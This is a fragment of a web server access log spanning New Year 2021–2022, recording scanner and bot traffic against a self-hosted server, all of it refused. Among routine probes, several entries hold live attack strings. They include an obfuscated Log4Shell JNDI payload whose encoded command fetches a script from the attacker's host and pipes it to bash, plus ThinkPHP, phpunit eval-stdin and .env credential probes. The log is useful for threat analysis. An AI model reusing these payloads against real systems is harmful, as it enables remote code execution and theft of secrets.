-] "curl/7.54.0" "-" [31/Dec/2021:09:16:14 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/start.asp" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:15 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/start.asp" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:15 +0000] 400 - - http localhost "-" [Client 172.104.140.107] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:09:16:16 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/index.jsa" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:16 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/index.jsa" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:17 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/indice.aspx" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:17 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/indice.aspx" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:17 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/menu.cgi" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:18 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/menu.cgi" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:18 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/inicio.pl" [Client 172.104.140.107] [Length 0] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:18 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/inicio.pl" [Client 172.104.140.107] [Length 252] [Gzip -] "curl/7.54.0" "-" [31/Dec/2021:09:16:19 +0000] 444 - GET https localhost "/" [Client 172.104.140.107] [Length 0] [Gzip -] "-" "-" [31/Dec/2021:09:16:19 +0000] 400 - GET http localhost "/" [Client 172.104.140.107] [Length 252] [Gzip -] "-" "-" [31/Dec/2021:09:16:20 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 172.104.140.107] [Length 0] [Gzip -] "-" "-" [31/Dec/2021:09:16:20 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 172.104.140.107] [Length 252] [Gzip -] "-" "-" [31/Dec/2021:09:25:07 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Dec/2021:09:45:06 +0000] 444 - GET https 64.22.31.253 "/login.cs" [Client 51.158.156.78] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0" "-" [31/Dec/2021:09:50:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Dec/2021:09:54:52 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Dec/2021:10:12:05 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [31/Dec/2021:10:12:06 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [31/Dec/2021:10:25:36 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Dec/2021:12:00:46 +0000] 444 - GET https 64.22.31.253 "/user/login?redirect=%2F" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [31/Dec/2021:12:08:03 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.212.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Dec/2021:12:22:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Dec/2021:12:39:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.58] [Length 0] [Gzip -] "-" "-" [31/Dec/2021:12:39:14 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.58] [Length 252] [Gzip -] "-" "-" [31/Dec/2021:12:39:14 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/" [Client 162.142.125.58] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [31/Dec/2021:13:16:00 +0000] 400 - POST http localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:13:18:43 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:13:18:44 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:13:43:53 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 145.239.154.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [31/Dec/2021:13:43:53 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 145.239.154.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [31/Dec/2021:13:43:53 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 145.239.154.82] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [31/Dec/2021:13:43:53 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 145.239.154.82] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [31/Dec/2021:13:43:53 +0000] 444 - HEAD https 64-22-31-253.res.aeneas.net "/" [Client 145.239.154.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [31/Dec/2021:13:43:54 +0000] 400 - HEAD http 64-22-31-253.res.aeneas.net "/" [Client 145.239.154.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [31/Dec/2021:14:47:41 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [31/Dec/2021:15:42:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.79] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Dec/2021:15:43:02 +0000] 444 - GET https 64.22.31.253 "/fuel" [Client 185.180.143.79] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Dec/2021:15:43:08 +0000] 444 - GET https 64.22.31.253 "/fuel/modules/fuel/assets/css/fuel.css" [Client 185.180.143.79] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Dec/2021:16:49:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Dec/2021:17:03:36 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 172.105.189.111] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Dec/2021:17:29:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.209.59] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Dec/2021:17:36:14 +0000] 444 - GET https agent.moralanimal.net "/" [Client 34.96.130.29] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [31/Dec/2021:18:04:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Dec/2021:18:27:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [31/Dec/2021:19:00:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.163] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [31/Dec/2021:20:38:29 +0000] 400 - - http localhost "-" [Client 77.83.36.32] [Length 154] [Gzip -] "-" "-" [31/Dec/2021:20:44:39 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Dec/2021:20:44:39 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Dec/2021:21:38:04 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.207.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Dec/2021:21:38:09 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.209.65] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Dec/2021:21:40:31 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.195.166] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Dec/2021:22:36:19 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Dec/2021:22:36:20 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Dec/2021:23:28:11 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Dec/2021:23:28:11 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Dec/2021:23:38:29 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Dec/2021:23:38:29 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Dec/2021:23:57:46 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [31/Dec/2021:23:57:47 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Jan/2022:00:15:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Jan/2022:00:18:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.42] [Length 0] [Gzip -] "-" "-" [01/Jan/2022:00:18:42 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.42] [Length 252] [Gzip -] "-" "-" [01/Jan/2022:00:18:42 +0000] 400 - GET http whoami.moralanimal.net "/" [Client 167.94.138.42] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [01/Jan/2022:00:44:09 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Jan/2022:00:47:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.37.254.80] [Length 0] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/53.6.18" "-" [01/Jan/2022:00:47:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.37.254.80] [Length 0] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/53.6.18" "-" [01/Jan/2022:00:47:37 +0000] 444 - GET https localhost "/" [Client 54.37.254.80] [Length 0] [Gzip -] "-" "-" [01/Jan/2022:00:47:38 +0000] 400 - GET http localhost "/" [Client 54.37.254.80] [Length 252] [Gzip -] "-" "-" [01/Jan/2022:00:47:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 54.37.254.80] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-" [01/Jan/2022:00:47:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 54.37.254.80] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.2228.0 Safari/537.36" "-" [01/Jan/2022:00:47:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 54.37.254.80] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-" [01/Jan/2022:00:47:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 54.37.254.80] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-" [01/Jan/2022:00:47:39 +0000] 400 - GET http 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 54.37.254.80] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.2223.0 Safari/537.36" "-" [01/Jan/2022:00:47:39 +0000] 400 - GET http 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 54.37.254.80] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.2223.0 Safari/537.36" "-" [01/Jan/2022:00:47:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 54.37.254.80] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299" "-" [01/Jan/2022:02:05:34 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 34.77.162.14] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [01/Jan/2022:02:10:05 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.96.130.10] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [01/Jan/2022:02:19:37 +0000] 444 - GET https komga.moralanimal.net "/" [Client 34.86.35.21] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [01/Jan/2022:02:20:08 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Jan/2022:02:30:09 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Jan/2022:03:05:54 +0000] 444 - GET https remote.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:05:55 +0000] 444 - GET https autodiscover.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:05:56 +0000] 444 - GET https webmail.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:05:56 +0000] 444 - GET https mail2.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:05:57 +0000] 444 - GET https mx.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:05:57 +0000] 444 - GET https exchange.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:05:58 +0000] 444 - GET https owa.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:05:58 +0000] 444 - GET https smtp.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:05:59 +0000] 444 - GET https mx1.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:05:59 +0000] 444 - GET https mail1.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:00 +0000] 444 - GET https email.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:00 +0000] 444 - GET https mx2.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:01 +0000] 444 - GET https mx01.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:01 +0000] 444 - GET https mx0.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:02 +0000] 444 - GET https posta.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:02 +0000] 444 - GET https mail3.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:03 +0000] 444 - GET https office.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:04 +0000] 444 - GET https mailserver.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:04 +0000] 444 - GET https mailhost.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:05 +0000] 444 - GET https mail01.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:05 +0000] 444 - GET https correo.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:06 +0000] 444 - GET https ex.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:06 +0000] 444 - GET https server.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:03:06:07 +0000] 444 - GET https mailgate.moralanimal.net "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [01/Jan/2022:04:07:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.67] [Length 0] [Gzip -] "-" "-" [01/Jan/2022:04:50:53 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [01/Jan/2022:04:54:23 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Jan/2022:04:54:24 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Jan/2022:05:18:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.0.214.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Jan/2022:05:22:08 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Jan/2022:05:22:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Jan/2022:05:53:58 +0000] 400 - GET http localhost "/admin/config.php" [Client 196.11.178.136] [Length 252] [Gzip -] "gbrmss/7.29.0" "-" [01/Jan/2022:06:10:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.90] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Jan/2022:06:40:45 +0000] 444 - POST 